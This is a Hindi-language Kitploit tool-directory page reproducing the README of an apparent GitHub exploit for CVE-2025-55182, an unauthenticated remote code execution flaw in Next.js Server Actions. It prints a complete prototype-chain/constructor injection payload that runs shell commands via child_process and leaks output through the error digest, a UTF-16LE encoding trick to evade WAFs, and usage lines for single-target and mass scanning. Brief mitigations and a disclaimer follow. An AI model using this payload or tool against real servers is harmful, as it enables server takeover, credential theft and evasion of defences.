Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — Proof-of-concept research tool for CVE-2025-55182, a critical unauthenticated RCE in Next.js App Router caused by server-side object injection in React Server Components and Server Actions, including UTF-16LE WAF evasion techniques. | Kitploit
उपकरण/GitHubGitHub/ceh-aditya-raj/cve-2025-55182
Vulnerability AnalysisExploitationWeb Application ExploitationWAF BypassPenetration TestingLearning & EducationRed TeamingPayload Development

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
ceh-aditya-raj/cve-2025-55182

CVE-2025-55182

Proof-of-concept research tool for CVE-2025-55182, a critical unauthenticated RCE in Next.js App Router caused by server-side object injection in React Server Components and Server Actions, including UTF-16LE WAF evasion techniques.

रिपॉजिटरी देखें
28 महीने पहलेअभी तक समीक्षित नहीं

🚨 NextRce — CVE-2025-55182 (Next.js / React Server Components RCE)

NextRce एक सुरक्षा अनुसंधान उपकरण है जो CVE-2025-55182 का प्रदर्शन करता है, जो Next.js App Router अनुप्रयोगों में React Server Components (RSC) और Server Actions का उपयोग करने वाली एक गंभीर कमजोरी है।

यह कमजोरी एक हमलावर को अप्रमाणित रिमोट कोड निष्पादन (RCE) प्राप्त करने की अनुमति देती है, जिससे Next.js Server Action प्रतिक्रियाओं को संसाधित करने और सीरियलाइज़्ड RSC पेलोड को सर्वर पर हल करने के तरीके का दुरुपयोग किया जाता है।


🛠 कमजोरी का अवलोकन

CVE-2025-55182 Next.js App Router आर्किटेक्चर में मौजूद है और इसे सर्वर-साइड ऑब्जेक्ट इंजेक्शन / प्रोटोटाइप चेन दुरुपयोग समस्या के रूप में वर्गीकृत किया जा सकता है, जो multipart/form-data अनुरोधों को संभालने के दौरान उत्पन्न होती है।

जब कोई Server Action ट्रिगर होता है, तो Next.js सर्वर संरचित क्लाइंट इनपुट पर भरोसा करता है और उसे डिसीरियलाइज़ करता है। एक विशेष रूप से तैयार पेलोड भेजकर, हमलावर आंतरिक रिज़ॉल्यूशन लॉजिक में हेरफेर कर सकता है और Node.js रनटाइम में मनमाना सिस्टम कमांड निष्पादित कर सकता है।


📌 मूल कारण

कमजोरी निम्नलिखित संयुक्त कारकों के कारण उत्पन्न होती है:

  • Server Actions विश्वास मॉडल
    Server Actions संरचित क्लाइंट पेलोड स्वीकार करते हैं जो आंतरिक React Server Component रिज़ॉल्यूशन लॉजिक के माध्यम से अपर्याप्त सत्यापन के साथ संसाधित होते हैं।

  • RSC रिज़ॉल्यूशन के दौरान ऑब्जेक्ट इंजेक्शन
    तैयार पेलोड JavaScript प्रोटोटाइप चेन और कंस्ट्रक्टर संदर्भों का दुरुपयोग कर सकते हैं, जिससे इच्छित ऑब्जेक्ट स्कोप से बचा जा सकता है।

  • अपर्याप्त सैनिटाइज़ेशन
    then, _response, और form-data गेटर जैसे आंतरिक फ़ील्ड दुर्भावनापूर्ण हेरफेर से पर्याप्त रूप से संरक्षित नहीं हैं।

  • एन्कोडिंग-आधारित WAF बाईपास
    कई Web Application Firewalls UTF-8 या मानक JSON पर ध्यान केंद्रित करते हैं। पेलोड को UTF-16LE के रूप में एन्कोड करने से वे निरीक्षण को बायपास कर सकते हैं, जबकि Next.js सर्वर उन्हें सही ढंग से डिकोड करता है।


🔬 पेलोड विश्लेषण

शोषण एक multipart अनुरोध के अंदर एक तैयार RSC पेलोड इंजेक्ट करने पर निर्भर करता है।
पेलोड का एक सरलीकृत संस्करण नीचे दिखाया गया है:

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('{cmd}').toString('base64'); throw Object.assign(new Error('x'),{digest: res});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

🧠 शोषण का विवरण

1. प्रोटोटाइप चेन हाइजैक

  • "then": "$1:__proto__:then"
  • यह then प्रॉपर्टी को ओवरराइड करके जावास्क्रिप्ट की प्रोटोटाइप चेन का दुरुपयोग करता है, जिससे Next.js रनटाइम में React Server Component प्रोसेसिंग के दौरान Promises के रिज़ॉल्यूशन में हस्तक्षेप होता है।

2. कंस्ट्रक्टर एस्केप

  • "_formData": { "get": "$1:constructor:constructor" }
  • यह वैश्विक Function कंस्ट्रक्टर तक पहुंच प्रदान करता है, जिससे इच्छित सैंडबॉक्स के बाहर मनमाना JavaScript निष्पादित किया जा सकता है।

3. रिमोट कोड निष्पादन

  • process.mainModule .require('child_process') .execSync('{cmd}')
  • Node.js आंतरिक मॉड्यूल तक पहुंचता है
  • मनमाना ऑपरेटिंग सिस्टम कमांड सिंक्रोनस रूप से निष्पादित करता है
  • Next.js सर्वर प्रक्रिया के समान विशेषाधिकारों के साथ चलता है

4. डाइजेस्ट-आधारित आउटपुट एक्सफ़िल्ट्रेशन

  • throw Object.assign(new Error('x'), { digest: res });
  • Next.js विस्तृत त्रुटि संदेशों को तब तक दबाता है जब तक कि डाइजेस्ट फ़ील्ड मौजूद न हो।
  • Base64-एन्कोडेड कमांड आउटपुट को डाइजेस्ट प्रॉपर्टी से जोड़कर, सर्वर अनजाने में HTTP प्रतिक्रिया में निष्पादन परिणाम लौटा देता है।

5. WAF बाईपास (UTF-16LE)

  • पेलोड को UTF-16LE के रूप में एन्कोड करके भेजा जा सकता है:
  • Content-Type: text/plain; charset=utf-16le
  • कई WAF इंजन UTF-16LE सामग्री को डीकोड और निरीक्षण करने में विफल रहते हैं, जबकि Next.js सर्वर इसे सही ढंग से डीकोड और प्रोसेस करता है, जिससे शोषण विश्वसनीयता बढ़ जाती है।

💥 प्रभाव

CVE-2025-55182 के सफल शोषण के परिणामस्वरूप हो सकता है:

  • 🔥 पूर्ण रिमोट कोड निष्पादन

  • 🗄️ संवेदनशील डेटा और क्रेडेंशियल तक पहुंच

  • 🔗 बुनियादी ढांचे के भीतर पार्श्व आंदोलन

  • 📦 आपूर्ति श्रृंखला समझौता

  • 🚨 पूर्ण सर्वर अधिग्रहण

  • गंभीरता: गंभीर

  • प्रमाणीकरण आवश्यक: नहीं

🛡 शमन

CVE-2025-55182 से बचाव के लिए:

  • तुरंत Next.js को पैच किए गए संस्करण में अपग्रेड करें
  • अप्रयुक्त Server Actions को अक्षम करें
  • multipart/form-data अनुरोधों का सख्त सत्यापन लागू करें
  • UTF-16LE एन्कोडेड पेलोड का पता लगाने के लिए WAF नियम जोड़ें
  • असामान्य Next-Action हेडर और अनुरोध पैटर्न की निगरानी करें

🚀 उपयोग

एकल लक्ष्य

  • python3 exploit.py -u https://target.com -c "whoami"

WAF बाईपास के साथ बड़े पैमाने पर स्कैन

  • python3 exploit.py -l urls.txt -B -t 50

⚠️ अस्वीकरण

  • यह प्रोजेक्ट केवल शैक्षिक, अनुसंधान और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

  • इस उपकरण का उपयोग उन सिस्टमों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।

  • लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।

टूल डाउनलोड करें